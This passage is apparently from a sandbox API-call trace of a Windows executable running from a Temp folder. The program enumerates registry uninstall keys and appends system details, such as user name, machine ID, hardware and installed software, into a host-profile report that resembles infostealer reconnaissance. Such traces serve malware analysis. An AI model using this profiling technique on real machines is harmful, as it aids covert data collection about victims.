lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 " [0175.936] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001" [0175.936] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\n" [0175.936] RegCloseKey (hKey=0x354) returned 0x0 [0175.936] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2a, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.936] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}") returned 90 [0175.936] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.936] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.936] RegCloseKey (hKey=0x354) returned 0x0 [0175.936] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2b, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.936] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}") returned 90 [0175.936] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.937] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x0, lpData=0x197bd4*=0x31, lpcbData=0x197fd4*=0x400) returned 0x2 [0175.937] RegCloseKey (hKey=0x354) returned 0x0 [0175.937] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x2c, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0090-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.937] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0090-0409-0000-0000000FF1CE}") returned 90 [0175.937] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0090-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.937] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft DCF MUI (English) 2016", lpcbData=0x197fd4*=0x21) returned 0x0 [0175.937] lstrlenA (lpString="Microsoft DCF MUI (English) 2016") returned 32 [0175.937] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft DCF MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016" [0175.937] 